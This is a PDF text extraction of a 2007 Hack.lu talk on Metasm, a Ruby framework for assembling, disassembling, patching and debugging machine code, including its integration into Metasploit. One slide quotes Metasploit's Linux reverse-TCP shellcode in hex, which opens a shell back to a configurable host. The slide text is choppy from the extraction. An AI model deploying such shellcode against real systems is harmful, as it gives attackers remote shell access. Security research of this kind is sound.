07-hacklu-metasm
Transcript of 07-hacklu-metasm
-
8/8/2019 07-hacklu-metasm
1/26
Metasma ruby (dis)assembler
Yoann Guillot
20 october 2007
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
2/26
MetasmDemonstrations
Presentation
I am Yoann GuillotI work for Sogeti/ESEC in the security R&D lab
Metasm HACK.LU 2007 2 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
3/26
MetasmDemonstrations
Architecture overviewAssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Plan
1 MetasmArchitecture overviewAssemblyDisassemblyExecutable file handlingC compiler
Live process interactionUse casesMetasploit 3
2 Demonstrations
Metasm HACK.LU 2007 3 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
4/26
MetasmDemonstrations
Architecture overviewAssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Introduction
Metasm is a full-Ruby standalone framework
To manipulate machine code (static or dynamic)Multi-CPU (Ia32/MIPS for now)Multi-OS (Windows/Linux)
distributed under the open-source LGPL license
http://metasm.cr0.org/
still under heavy developpement
Metasm HACK.LU 2007 4 / 23
A hi i
http://metasm.cr0.org/http://metasm.cr0.org/http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
5/26
MetasmDemonstrations
Architecture overviewAssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Architecture overview
Metasm HACK.LU 2007 5 / 23
A hit t i
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
6/26
MetasmDemonstrations
Architecture overviewAssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Assembly
EncodedData represents a relocatable binary stringbinary dataarbitrary relocationsexportsvirtual size
used to dissociate assembly from linking
Metasm HACK.LU 2007 6 / 23
Architecture overview
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
7/26
MetasmDemonstrations
Architecture overviewAssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Assembly
mov eax, dword ptr [toto]
Metasm HACK.LU 2007 7 / 23
Architecture overview
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
8/26
MetasmDemonstrations
Architecture overviewAssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Disassembly
simple yet powerful backtracking engine
emulates standard CPU instructionsfollows precisely code flowcurrently unfinished
trace data access
handle subfunctions
handle external API calls
minimal arch-specific developpement
Metasm HACK.LU 2007 8 / 23
Architecture overview
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
9/26
MetasmDemonstrations
Architecture overviewAssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Handling executable files
readingfrom a filedirectly in memory
writing
from scratch
patch an existing execurrently supported formats: MZ / PE / COFF, ELF / a.out
Metasm HACK.LU 2007 9 / 23
Architecture overview
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
10/26
MetasmDemonstrations
Architecture overviewAssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
C Compilation
Metasm includes a complete C parser
features header filtering
basic compiler for Ia32
Metasm HACK.LU 2007 10 / 23
Architecture overview
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
11/26
MetasmDemonstrations
c t ct oAssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Live process interaction
String-like process memory abstraction
transparent read/write
Ruby objects wrap the host OS debug API
Metasm HACK.LU 2007 11 / 23
Architecture overview
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
12/26
MetasmDemonstrations
AssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
When is it useful
whenever you want to manipulate machine code or executablefiles
its easy to hook/rewrite/customize any internal method
Metasm HACK.LU 2007 12 / 23
Architecture overview
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
13/26
MetasmDemonstrations
AssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Metasploit 3 - before
Metasploit 3 is also written in Ruby
it had very bad machine code support
hexadecimal static shellcodeshacks to patch the shellcodes with user-specified values
more hacks to link stages
Metasm HACK.LU 2007 13 / 23
Architecture overview
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
14/26
MetasmDemonstrations
AssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Metasploit 3 - before[metasploit3/.../reverse tcp.rb]
Payload =>
{
Offsets =>
{
LHOST => [ 0x1a, ADDR ],
LPORT => [ 0x20, n ],
},
Payload =>
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" +
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68" +
"\xbf\xbf\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" +
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +"\x89\xe1\xb0\x0b\xcd\x80"
}
Metasm HACK.LU 2007 14 / 23
Architecture overviewA bl
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
15/26
MetasmDemonstrations
AssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Metasploit 3 - now[metasploit3/.../reverse tcp2.rb]
Payload => {
Offsets => {
LHOST => [ 0, ADDR ],
LPORT => [ 0, n ],
},
Assembly =>
-
8/8/2019 07-hacklu-metasm
16/26
MetasmDemonstrations
AssemblyDisassemblyExecutable file handlingC compilerLive process interactionUse casesMetasploit 3
Metasploit 3 - now
Metasm is now included in Metasploitshellcodes can be in source fromstandard Metasm relocation handling may be used forshellcode patching/linking???
Profit !
Metasm HACK.LU 2007 16 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
17/26
MetasmDemonstrations
metasm-shellExe manipulationLive process interaction
Plan
1 Metasm
2 Demonstrationsmetasm-shellExe manipulation
Live process interaction
Metasm HACK.LU 2007 17 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
18/26
MetasmDemonstrations
metasm-shellExe manipulationLive process interaction
metasm-shell
metasm-shell
adds metasm methods to standard Ruby Stringsoffers an interactive assembler shell
Metasm HACK.LU 2007 18 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
19/26
MetasmDemonstrations
metasm-shellExe manipulationLive process interaction
Exe manipulation
reading a MIPS ELF
Metasm HACK.LU 2007 19 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
20/26
MetasmDemonstrations
metasm-shellExe manipulationLive process interaction
Exe manipulation
reading a MIPS ELF
compiling a simple PE [samples/testpe.rb]
Metasm HACK.LU 2007 19 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
21/26
MetasmDemonstrations
metasm-shellExe manipulationLive process interaction
Exe manipulation
reading a MIPS ELF
compiling a simple PE [samples/testpe.rb]
patching a PE [samples/pe-hook.rb]
Metasm HACK.LU 2007 19 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
22/26
MetasmDemonstrations
metasm-shellExe manipulationLive process interaction
Windows process hooking
simple IAT hook [samples/win32hooker.rb]
Metasm HACK.LU 2007 20 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
23/26
MetasmDemonstrations
metasm-shellExe manipulationLive process interaction
Windows process hooking
full-library hook [samples/win32hooker-advanced.rb]
redirect all exported function to a custom hook
Metasm HACK.LU 2007 21 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
24/26
MetasmDemonstrations
metasm-shellExe manipulationLive process interaction
Linux debugging
ptrace wrapper [samples/rubstop.rb]singlestep, stepover, etcmemory accessPaX compatible
Metasm HACK.LU 2007 22 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
25/26
MetasmDemonstrations
metasm-shellExe manipulationLive process interaction
Linux debugging
ptrace wrapper [samples/rubstop.rb]singlestep, stepover, etcmemory accessPaX compatible
UI [samples/lindebug.rb]
console-mode only (for now)
Metasm HACK.LU 2007 22 / 23
http://find/http://goback/ -
8/8/2019 07-hacklu-metasm
26/26
MetasmDemonstrations
metasm-shellExe manipulationLive process interaction
Conclusion
Thanks for listening
Questions ?
Metasm HACK.LU 2007 23 / 23
http://find/http://goback/